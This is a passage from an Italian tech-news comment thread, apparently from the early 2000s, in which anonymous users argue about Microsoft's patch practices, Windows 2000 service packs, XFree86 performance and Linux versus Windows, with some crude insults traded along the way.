            risolverlo... www.berlin-project.orgBeh devi amettere però che l'architettura di X non è che sia il massimo,specie nel fare uso di schede accelerate
          • Anonimo scrive:
            Re: Concorrenza
            - Scritto da: pikappa

            X non è un problema, e anche se lo fosse

            sono in pochi quelli che hanno intenzione

            di risolverlo... www.berlin-project.org
            Beh devi amettere però che l'architettura di
            X non è che sia il massimo,specie nel fare
            uso di schede accelerateBeh, già nel passaggio da XFree3 a XFree4 io ho visto un miglioramento non da poco... la mia Gatrox G400 è passata da 0,5 Frame/s a più di 80 (!) su una scena OpenGL (non ho fatto test, ho solo provato con XScreensaver...), quindi il futuro promette solo bene. Anche l'occupazione di memoria di X è calata di molto (anche questa misurata a spanne, cmq).Inoltre, molte persone sono disposte a rinunciare alla velocità (io non gioco) per avere la maggiore flessibilità e potenza di X11 (hai mai provato ad usare LapLink o simili?).
        • Anonimo scrive:
          Re: Concorrenza
          - Scritto da: pikappa
          [...] anche se credo che il problema di
          Linux sul fronte desktop sia X.Occhio che l'X server usato dalla quasi totalita' delle distro e' Xfree, libero e gratuito.I server commerciali (ci sono, molto costosi e molto closed..) hanno prestazioni velocistiche assai migliori.
    • Anonimo scrive:
      Re: Concorrenza
      - Scritto da: pikappa
      Questo e'il segno che La
      presenza dell'Open Source come concorrente
      ha dato una smossa a M$ che forse si
      e'decisa a prendere sul serio la
      sicurezza(+che altro xmantenere la sua
      posizione di dominatrice del
      mercato)
      La concorrenza puo'solo fare del bene ad
      entrambi che si miglioreranno per superarsi
      a vicenda.Sono d'accordo e lo stesso ragionamento è valido anche dall'altra parte. Anche Linux (e, in misura minore, i *BSD) si stanno muovendo verso una facilitazione d'uso (ormai l'installazione è risolta, ora ci si concentra sulla configurazione e l'amministrazione).La concorrenza fa bene a tutti. Adesso bisognerebbe spiegarlo a Darth, Ciao, ZeroSS, Coppo, ...
      • Anonimo scrive:
        Re: Concorrenza
        - Scritto da: A.C.
        La concorrenza fa bene a tutti. Adesso
        bisognerebbe spiegarlo a Darth, Ciao,
        ZeroSS, Coppo, ...Trovami un solo post dove io abbia affermato e/o sostenuto il contrario e ti pago una cena...Zeross
        • Anonimo scrive:
          Re: Concorrenza

          Trovami un solo post dove io abbia affermato
          e/o sostenuto il contrario e ti pago una
          cena...Ed io ci metto il dolce.
  • Anonimo scrive:
    Pacchi e pacchetti, bachi & bachetti...
    Trovo stupefacente che M$ non riesca almeno per una volta a inglobare tutte le patch inventate finora ALL'INTERNO del programma che evidentemente ne abbisogna e POI ridistribuirlo.Ed in ogni caso, dato che le cosiddette 'patch' vanno (o dovrebbero) tappare le falle del system, non sarebbe male che almeno i cosiddetti 'suoi clienti registrati' ricevessero da M$ una versione aggiornata della loro copia - o 'copie'- bacata ed a titolo GRATUITO.Ma temo che sia chiedere troppo ad una azienda che si chiama M$....E in piu' c'e' da tenere sempre ben presente l'ammirevole masochismo dell'utenza Win in genere: per quante glie ne facciano passare, da Redmond, non ne hanno mai 'abbastanza'. Comportamento che ricorda curiosamente la tossicodipendenza, quella vera.Attenti alle overdose da patch.... potreste schiattare.
    • Anonimo scrive:
      Re: Pacchi e pacchetti, bachi & bachetti...
      la tua idea e magnifica ma non hai considerato alcune cose....se m$ dovesse stampare una versione nuova di windows ogni volta che si scopre un nuovo buco....allora solo il service pack 3 fixera 730, sono circa 1590(contati a grosso modo ma mi sbagliero di una 10ina) se microsoft dovesse ridistribbuire windows a tutti i suoi clienti significherebbe avere 1590 cd diversi si windows 2000. qunidi se nel mio ufficio ho : 1 win nt4, un win98 e un win 2k alla media di 1000 fix (siamo ottimisti) a sistema operativo avrei circa 4800 cd microsoft per l'ufficio !!!!!!! non che bisognerebbe riformattare windows una volta al giorno per avere sempre il pc aggiornato.un saluto a tutti.
    • Anonimo scrive:
      Tra l'altro, non è detto che le patch migliorino W
      Nella mia società e capitato che, installato SQL Server e Commerce Server su W2000 server, in produzione tutto andasse ok.Una volta finito di sviluppare il nostro bel sitino, e trasportato tutto su W2000 advanced serverl, applicando a SP1 di SQL Server, Commerce Server non ha più voluto caricare il catalogo nel sito, e dopo una settimana di telefonate con M$, si è scoperto che SP1 è bacato.....Figo vero ??
      • Anonimo scrive:
        Re: Tra l'altro, non ?detto che le patch migliorino W
        Forse sei un po' pirla, o forse non hai avuto a fare con i server per lavoro.Ci sono casi, e non pochi, in cui replicare l'esatta configurazione e' praticamente impossibile (gia', perche' per poter fare una cosa del genere bisognerebbe prima di ogni patch (che sono una caterva), fare una copia totale della situazione del server da patchare), e fare delle prove con sistemi simili e' poco utile.Alla fine il massimo che puoi fare e' procurarti tutto il necessario per sbloccare il server.Che bisogna metterci molta prudenza, prevedere eventuali disastri e' una questiona di professionalita' (e qui hai ragione a dire che spesso manca), che si possa testare prima e' una pirlata galattica.
        • Anonimo scrive:
          Re: Tra l'altro, non ?detto che le patch migliorino W

          Forse sei un po' pirla, o forse non hai
          avuto a fare con i server per lavoro.???[zac!] Alla fine il massimo che puoi fare e'
          procurarti tutto il necessario per sbloccare
          il server.
          Che bisogna metterci molta prudenza,
          prevedere eventuali disastri e' una
          questiona di professionalita' (e qui hai
          ragione a dire che spesso manca), che si
          possa testare prima e' una pirlata
          galattica.guarda. installi il server, lo metti in produzione.Poi prima di fare QUALSIASI cosa fai un test sul server di prova, che hai ottenuto facendo copia con ghost del server in produzione.E' così complicato?
    • Anonimo scrive:
      Re: Pacchi e pacchetti, bachi & bachetti...
      - Scritto da: Tiziano, UD
      Trovo stupefacente che M$ non riesca almeno
      per una volta a inglobare tutte le patch
      inventate finora ALL'INTERNO del programma
      che evidentemente ne abbisogna e POI
      ridistribuirlo.ma come sei messo cosi per applicare una patch bisogna reinstallare tutto.
      Ed in ogni caso, dato che le cosiddette
      'patch' vanno (o dovrebbero) tappare le
      falle del system, non sarebbe male che
      almeno i cosiddetti 'suoi clienti
      registrati' ricevessero da M$ una versione
      aggiornata della loro copia - o 'copie'-
      bacata ed a titolo GRATUITO.come sopra non stai messo bene prova ad allungare l'erba che fumi
      Ma temo che sia chiedere troppo ad una
      azienda che si chiama M$....chiedi e ti sarà dato
      E in piu' c'e' da tenere sempre ben presente
      l'ammirevole masochismo dell'utenza Win in
      genere: per quante glie ne facciano passare,
      da Redmond, non ne hanno mai 'abbastanza'.
      Comportamento che ricorda curiosamente la
      tossicodipendenza, quella vera.
      Attenti alle overdose da patch.... potreste
      schiattare.credo che tu abbia esagerato con la maria, fai cosi se ti viene voglia ancora una volta di postare strunz...fatti ricoverare (ti consiglio l'elettroshoch).
      • Anonimo scrive:
        Re: Pacchi e pacchetti, bachi & bachetti...
        Che gli ut. win* siano sotoposti ad aggiornamenti vari (il più delle volte di facciata), patch, etc. è risaputo e normale. Daltronde quando il cliente acquista win e relativo sw, deve aspettarsi di trovarsi davanti ad un sistema che è facilmente implementabile, ma carente nel resto.Certo cmq vanno ammirati i clienti M$, nonostante ciò continuano impertereti ad abbracciare M$.Tuttavia sulle patchs, nonn vi dovrebbe essere bisogno di una divisione di test, poichè dovrebbero essere già stati testati da M$. Oltrettutto se cosi fosse, i singoli ut. che non possono disporre di divisioni di test, che dovrebbero fare (come è capitato a molti)?
      • Anonimo scrive:
        Re: Pacchi e pacchetti, bachi & bachetti...
        - Scritto da: enveridemenziale
        - Scritto da: Tiziano, UD

        Trovo stupefacente che M$ non riesca

        almeno per una volta a inglobare tutte

        le patch inventate finora ALL'INTERNO

        del programma che evidentemente ne

        abbisogna e POI ridistribuirlo.
        ma come sei messo cosi per applicare una
        patch bisogna reinstallare tutto.Non dire Czte !!! Si vede che sei abituato a win e non a un SO serio.Se compri un CD di linux ti trovi la versione aggiornata dei pacchetti e puoi aggironare solo quelli che lo necessitano automaticamente.reinstallare tutto si fa solo con i SO x utonti.

        Ed in ogni caso, dato che le cosiddette

        'patch' vanno (o dovrebbero) tappare le

        falle del system, non sarebbe male che

        almeno i cosiddetti 'suoi clienti

        registrati' ricevessero da M$ una versione

        aggiornata della loro copia - o 'copie'-

        bacata ed a titolo GRATUITO.
        come sopra non stai messo bene prova ad
        allungare l'erba che fumiForse tu dovresti cominciare...Sono comunque daccordo che non ti arrivi un cidi' al giorno da M$, ma almeno, se non cel'ho e voglio comprare un '98 vorrei almeno una 3' edition.

        Ma temo che sia chiedere troppo ad una

        azienda che si chiama M$....
        chiedi e ti sarà datoSembra che riescano meglio quelli che qualcuno definisce 4 programmatori flaschati.

        E in piu' c'e' da tenere sempre ben

        presente l'ammirevole masochismo

        dell'utenza Win in genere: per quante glie

        ne facciano passare, da Redmond, non ne

        hanno mai 'abbastanza'.

        Comportamento che ricorda curiosamente la

        tossicodipendenza, quella vera.

        Attenti alle overdose da patch....

        potreste schiattare.
        credo che tu abbia esagerato con la maria,
        fai cosi se ti viene voglia ancora una volta
        di postare strunz...
        fatti ricoverare (ti consiglio
        l'elettroshoch).Io ti consiglio di drogarti un po' di piu' tra una reinstallazione e l'altra.
        • Anonimo scrive:
          Re: Pacchi e pacchetti, bachi & bachetti...
          - Scritto da: Caine
          - Scritto da: enveridemenziale


          - Scritto da: Tiziano, UD


          Trovo stupefacente che M$ non riesca


          almeno per una volta a inglobare tutte


          le patch inventate finora ALL'INTERNO


          del programma che evidentemente ne


          abbisogna e POI ridistribuirlo.


          ma come sei messo cosi per applicare una

          patch bisogna reinstallare tutto.

          Non dire Czte !!! Si vede che sei abituato a
          win e non a un SO serio.linux e serio ahahahahahaha ma se ha un numero dipatch e buchi paragonabili a win
          Se compri un CD di linux ma non era gratis
          ti trovi la
          versione aggiornata dei pacchetti e puoi
          aggironare solo quelli che lo necessitano
          automaticamente.
          reinstallare tutto si fa solo con i SO x
          utonti.ma chi a detto questo testicolo informatico



          Ed in ogni caso, dato che le cosiddette


          'patch' vanno (o dovrebbero) tappare le


          falle del system, non sarebbe male che


          almeno i cosiddetti 'suoi clienti


          registrati' ricevessero da M$ una
          versione


          aggiornata della loro copia - o
          'copie'-


          bacata ed a titolo GRATUITO.


          come sopra non stai messo bene prova ad

          allungare l'erba che fumi

          Forse tu dovresti cominciare...
          Sono comunque daccordo che non ti arrivi un
          cidi' al giorno da M$, ma almeno, se non
          cel'ho e voglio comprare un '98 vorrei
          almeno una 3' edition.mi ma ai esagerato cosa ai sniffato la tastiera



          Ma temo che sia chiedere troppo ad una


          azienda che si chiama M$....

          chiedi e ti sarà dato

          Sembra che riescano meglio quelli che
          qualcuno definisce 4 programmatori
          flaschati.si a creare strunzate flesciate



          E in piu' c'e' da tenere sempre ben


          presente l'ammirevole masochismo


          dell'utenza Win in genere: per quante
          glie


          ne facciano passare, da Redmond, non ne


          hanno mai 'abbastanza'.


          Comportamento che ricorda curiosamente
          la


          tossicodipendenza, quella vera.


          Attenti alle overdose da patch....


          potreste schiattare.


          credo che tu abbia esagerato con la maria,

          fai cosi se ti viene voglia ancora una
          volta

          di postare strunz...

          fatti ricoverare (ti consiglio

          l'elettroshoch).

          Io ti consiglio di drogarti un po' di piu'
          tra una reinstallazione e l'altra.o dovuto drogarmi per leggere le tue strunzate.ora devo andare da muccioli figlio, vai anche tu ma dal padre.
Chiudi i commenti